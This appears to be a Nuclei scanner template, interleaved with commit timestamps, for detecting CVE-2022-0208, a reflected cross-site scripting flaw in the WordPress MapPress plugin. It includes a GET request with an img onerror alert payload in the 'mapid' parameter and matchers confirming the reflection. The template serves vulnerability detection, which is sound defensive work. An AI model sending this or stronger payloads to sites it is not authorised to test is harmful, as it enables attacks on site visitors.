2022-04-24 10:37:48 +00:00
id : CVE-2022-0208
info :
2022-09-10 01:55:52 +00:00
name : WordPress Plugin MapPress <2.73.4 - Cross-Site Scripting
2022-04-24 10:37:48 +00:00
author : edoardottt
2022-09-10 02:12:57 +00:00
severity : medium
2022-09-10 01:55:52 +00:00
description : |
WordPress Plugin MapPress before version 2.73.4 does not sanitize and escape the 'mapid' parameter before outputting it back in the "Bad mapid" error message, leading to reflected cross-site scripting.
2022-04-24 10:37:48 +00:00
reference :
- https://wpscan.com/vulnerability/59a2abd0-4aee-47aa-ad3a-865f624fa0fc
2022-09-10 01:55:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2022-0208
2022-09-10 02:12:57 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score : 6.1
cve-id : CVE-2022-0208
cwe-id : CWE-79
2023-08-31 11:46:18 +00:00
epss-score : 0.00122
2023-07-11 19:49:27 +00:00
cpe : cpe:2.3:a:mappresspro:mappress:*:*:*:*:*:wordpress:*:*
2023-08-31 11:46:18 +00:00
epss-percentile : 0.45705
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
framework : wordpress
vendor : mappresspro
product : mappress
tags : cve2022,mappress,xss,wordpress,wp-plugin,wpscan,cve
2022-04-24 10:37:48 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-04-24 10:37:48 +00:00
- method : GET
path :
- "{{BaseURL}}/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E"
matchers-condition : and
matchers :
- type : word
part : header
words :
- "text/html"
- type : word
part : body
words :
- "<img src onerror=alert(document.domain)>"
- "Bad mapid"
2022-09-10 01:55:52 +00:00
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200